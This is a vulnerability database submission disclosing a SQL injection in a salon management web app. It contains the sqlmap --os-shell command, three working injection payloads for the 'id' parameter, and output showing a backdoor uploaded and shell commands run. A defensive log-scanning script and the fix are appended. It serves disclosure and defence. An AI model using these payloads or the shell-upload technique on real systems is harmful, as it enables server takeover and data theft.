Submission #186292: Simple Online Men's Salon Management System - SQL Injection Info

Title: Simple Online Men's Salon Management System - SQL Injection

Description:

# Exploit Title: Simple Online Men's Salon Management System - SQL Injection
# Exploit Author: Pratik Shetty
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html
# Version: v1.0
# Tested on: Windows 11, Apache

Description:
A SQL Injection issue in Simple Online Men's Salon Management System allows an attacker to get complete remote access to the website: database, files and everything.

Payload used:

```
python sqlmap.py -r read.TXT -p password --risk 2 --level 3 --os-shell
```

Parameter: the read.txt file is our payload file

```
GET /msms/admin/?page=user/manage_user&id=3 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=06rf7g4o1p13b8d4kpci1fobjb
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```

Steps to reproduce:
1. Here we take the GET request to "http://localhost/msms/admin/?page=user/manage_user&id=3", just this page only.
2. In this we target the parameter "id" and save the request to a txt file.
3. Now we use the "SQLMap" tool with the following command: **python sqlmap.py -r read.TXT -p password --risk 2 --level 3 --os-shell**
4. As we can see, we got complete access to the server.

```
[01:57:18] [INFO] testing 'MySQL UNION query (74) - 21 to 40 columns'
[01:57:18] [INFO] testing 'MySQL UNION query (74) - 41 to 60 columns'
[01:57:19] [INFO] testing 'MySQL UNION query (74) - 61 to 80 columns'
[01:57:20] [INFO] testing 'MySQL UNION query (74) - 81 to 100 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: page=user/manage_user&id=3' AND 4129=(SELECT (CASE WHEN (4129=4129) THEN 4129 ELSE (SELECT 2453 UNION SELECT 1417) END))-- -

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=user/manage_user&id=3' AND (SELECT 7719 FROM(SELECT COUNT(*),CONCAT(0x7171706271,(SELECT (ELT(7719=7719,1))),0x716b717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vkYP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=user/manage_user&id=3' AND (SELECT 4180 FROM (SELECT(SLEEP(5)))ffuw)-- mIxN
---
[01:58:04] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.4, Apache 2.4.56
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[01:58:04] [INFO] going to use a web backdoor for command prompt
[01:58:04] [INFO] fingerprinting the back-end DBMS operating system
[01:58:04] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
[01:58:10] [INFO] retrieved the web server document root: 'C:\xampp\htdocs'
[01:58:10] [INFO] retrieved web server absolute paths: 'C:/xampp/htdocs/msms/admin/index.php, C:/xampp/htdocs/msms/admin/user/manage_user.php'
[01:58:10] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[01:58:10] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:80/tmpuqhar.php
[01:58:10] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:80/tmpbfbsc.php
[01:58:10] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ls
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
'ls' is not recognized as an internal or external command,
operable program or batch file.
---
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'laptop-*********\pratik shetty'
os-shell>
```
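The three injection techniques sqlmap reported for the `id` parameter leave a simple trace in web server logs: the manage_user route only ever expects an integer id, so any other value is suspect, and the payload shapes (SLEEP, FLOOR(RAND()), CASE WHEN / UNION SELECT) tell the techniques apart. The script below is an added example, not part of the submission or of the vendor's code; the Apache-style log lines, the `/msms/admin/` path check and the technique signatures are assumptions modelled on the write-up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log lines (not taken from the submission): one benign
# manage_user request, the three sqlmap payloads quoted in the write-up (percent-encoded
# as a client sends them), and one unrelated admin page.
SAMPLE_LOG = """\
127.0.0.1 - - [23/Jul/2023:01:57:10 +0000] "GET /msms/admin/?page=user/manage_user&id=3 HTTP/1.1" 200 5120
127.0.0.1 - - [23/Jul/2023:01:57:18 +0000] "GET /msms/admin/?page=user/manage_user&id=3%27%20AND%204129%3D%28SELECT%20%28CASE%20WHEN%20%284129%3D4129%29%20THEN%204129%20ELSE%20%28SELECT%202453%20UNION%20SELECT%201417%29%20END%29%29--%20- HTTP/1.1" 200 5120
127.0.0.1 - - [23/Jul/2023:01:57:19 +0000] "GET /msms/admin/?page=user/manage_user&id=3%27%20AND%20%28SELECT%207719%20FROM%28SELECT%20COUNT%28*%29%2CCONCAT%280x7171706271%2C%28SELECT%20%28ELT%287719%3D7719%2C1%29%29%29%2C0x716b717a71%2CFLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29--%20vkYP HTTP/1.1" 500 312
127.0.0.1 - - [23/Jul/2023:01:57:25 +0000] "GET /msms/admin/?page=user/manage_user&id=3%27%20AND%20%28SELECT%204180%20FROM%20%28SELECT%28SLEEP%285%29%29%29ffuw%29--%20mIxN HTTP/1.1" 200 5120
127.0.0.1 - - [23/Jul/2023:01:58:30 +0000] "GET /msms/admin/?page=user/list HTTP/1.1" 200 4410
"""

# Timestamp and request line out of a combined-format log entry.
LOG_RE = re.compile(r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')

# Signatures for the three techniques sqlmap listed for this parameter (assumed heuristics).
TECHNIQUES = [
    ("time-based blind", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(|INFORMATION_SCHEMA", re.I)),
    ("boolean-based blind", re.compile(r"\bCASE\s+WHEN\b|\bUNION\s+SELECT\b", re.I)),
]

def classify_id(value: str):
    """None for a plain integer id (the only legitimate shape); otherwise a label."""
    if re.fullmatch(r"\d+", value.strip()):
        return None
    for label, pattern in TECHNIQUES:
        if pattern.search(value):
            return label
    return "non-numeric id (unclassified)"

def scan_log(text: str):
    """(timestamp, technique, decoded id) for each manage_user request with a non-integer id."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m or not m.group("target").startswith("/msms/admin/"):
            continue
        # parse_qs undoes the percent-encoding, so the signatures see the raw SQL.
        params = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        if params.get("page") != ["user/manage_user"]:
            continue
        for raw_id in params.get("id", []):
            verdict = classify_id(raw_id)
            if verdict:
                findings.append((m.group("ts"), verdict, raw_id))
    return findings
```

The same integer check on `id` before it reaches the query (or a prepared statement with the id bound as an integer) is also the server-side fix for this class of bug.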
Source: https://github.com/draco1725/POC/blob/main/Exploit/Simple%20Online%20Men's%20Salon%20Management%20System/SQL%20Injection
User: draco (UID 24011)
Submitted: 2023-07-23 22:40 (3 years ago)
Moderated: 2023-07-27 21:49 (4 days later)
Status: Accepted
VulDB Entry: 235608 [SourceCodester Simple Online Mens Salon Management System 1.0 manage_user&id=3 identifier SQL injection]
Points: 20
